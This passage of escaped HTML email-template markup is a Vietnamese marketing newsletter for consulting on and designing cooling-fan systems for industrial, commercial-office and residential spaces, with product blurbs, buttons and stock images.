<td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h1 style=\\\"margin: 0px; line-height: 140%; text-align: left; word-wrap: break-word; font-size: 22px; font-weight: 400;\\\">THI\\u1ebeT K\\u1ebe T\\u01af V\\u1ea4N GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T<\\/h1>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: helvetica,sans-serif; font-size: 14px; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 \\u1edf cao c\\u1ea5p.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; line-height: 140%; text-align: left; word-wrap: break-word; font-family: inherit; font-size: 17px; font-weight: 700;\\\"><strong>L\\u00c0M M\\u00c1T M\\u00d4I TR\\u01af\\u1edcNG C\\u00d4NG NGHI\\u1ec6P<\\/strong><\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; font-size: 14px; font-weight: 700; color: #236fa1; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng c\\u00f4ng nghi\\u1ec7p, n\\u00f4ng nghi\\u1ec7p, s\\u1ea3n xu\\u1ea5t, kho ch\\u1ee9a...<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; font-size: 14px; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">Trong m\\u00f4i tr\\u01b0\\u1eddng c\\u00f4ng nghi\\u1ec7p, vi\\u1ec7c ki\\u1ec3m so\\u00e1t lu\\u1ed3ng gi\\u00f3 kh\\u00f4ng kh\\u00ed \\u0111\\u1ea3m b\\u1ea3o nhi\\u1ec7t \\u0111\\u1ed9 ch\\u00eanh l\\u1ec7ch t\\u1eeb 3-6 \\u0111\\u1ed9 C v\\u1edbi kh\\u1ea3 n\\u0103ng ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n h\\u00e0ng n\\u0103m. Ch\\u1ec9 c\\u00f3 qu\\u1ea1t treo tr\\u1ea7n, qu\\u1ea1t th\\u1ed5i s\\u00e0n c\\u00f4ng nghi\\u1ec7p HVLS s\\u1ebd ph\\u00f9 cho b\\u1ea5t c\\u1ee9 kh\\u00f4ng gian r\\u1ed9ng l\\u1edbn n\\u00e0o v\\u1edbi hi\\u1ec7u su\\u1ea5t l\\u00e0m m\\u00e1t tuy\\u1ec7t v\\u1eddi, ki\\u1ec3m so\\u00e1t kh\\u00f4ng kh\\u00ed th\\u1ed5i s\\u00e0n \\u0111\\u01b0a lu\\u1ed3ng kh\\u00ed \\u0111\\u1ebfn nh\\u1eefng n\\u01a1i c\\u1ea7n thi\\u1ebft.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:37px; v-text-anchor:middle; width:165px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#e67e23\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #e67e23; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\">T\\u00ccM HI\\u1ec2U TH\\u00caM &gt;&gt;<\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677301324631-home_cf.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; line-height: 140%; text-align: left; word-wrap: break-word; font-family: \'Open Sans\',sans-serif; font-size: 17px; font-weight: 700;\\\"><strong>L\\u00c0M M\\u00c1T M\\u00d4I TR\\u01af\\u1edcNG V\\u0102N PH\\u00d2NG - TT TH\\u01af\\u01a0NG M\\u1ea0I<\\/strong><\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; font-size: 14px; font-weight: 700; color: #843fa1; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">D\\u00e0nh cho nh\\u00e0 h\\u00e0ng, s\\u1ea3nh ch\\u1edd, trung t\\u00e2m th\\u01b0\\u01a1ng m\\u1ea1i, v\\u0103n ph\\u00f2ng x\\u01b0\\u1edfng...<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; font-size: 14px; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">Cho d\\u00f9 to\\u00e0 nh\\u00e0 v\\u0103n ph\\u00f2ng l\\u00e0m vi\\u1ec7c cho \\u0111\\u1ebfn trung t\\u00e2m th\\u01b0\\u01a1ng m\\u1ea1i. H\\u1ec7 th\\u1ed1ng qu\\u1ea1t l\\u00e0m m\\u00e1t kh\\u00f4ng gian Commercial s\\u1ebd gi\\u00fap b\\u1ea1n chi ph\\u00ed ti\\u1ec1n \\u0111i\\u1ec7n h\\u00e0ng n\\u0103m l\\u00ean \\u0111\\u1ebfn 30%, gi\\u1ea3m t\\u1ea3i cho h\\u1ec7 th\\u1ed1ng \\u0111i\\u1ec1u ho\\u00e0 nhi\\u1ec7t \\u0111\\u1ed9 \\u1edf m\\u1ee9c th\\u1ea5p nh\\u1ea5t. Kh\\u00e1ch h\\u00e0ng v\\u00e0 nh\\u00e2n vi\\u00ean c\\u1ee7a b\\u1ea1n s\\u1ebd c\\u1ea3m th\\u1ea5y tho\\u1ea3i m\\u00e1i nhi\\u1ec7t v\\u00e0 c\\u00f4ng vi\\u1ec7c s\\u1ebd hi\\u1ec7u qu\\u1ea3 h\\u01a1n<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:37px; v-text-anchor:middle; width:165px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#e67e23\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #e67e23; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\">T\\u00ccM HI\\u1ec2U TH\\u00caM &gt;&gt;<\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677301347994-home_hgp.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; line-height: 140%; text-align: left; word-wrap: break-word; font-family: \'Open Sans\',sans-serif; font-size: 17px; font-weight: 700;\\\"><strong>L\\u00c0M M\\u00c1T M\\u00d4I TR\\u01af\\u1edcNG NH\\u00c0 \\u1ede - C\\u0102N H\\u1ed8 CHUNG C\\u01af<\\/strong><\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; font-size: 14px; font-weight: 700; color: #3598db; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">D\\u00e0nh cho nh\\u00e0 \\u1edf Villa, Penhouse, nh\\u00e0 \\u1edf chung c\\u01b0, bi\\u1ec7t th\\u1ef1.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 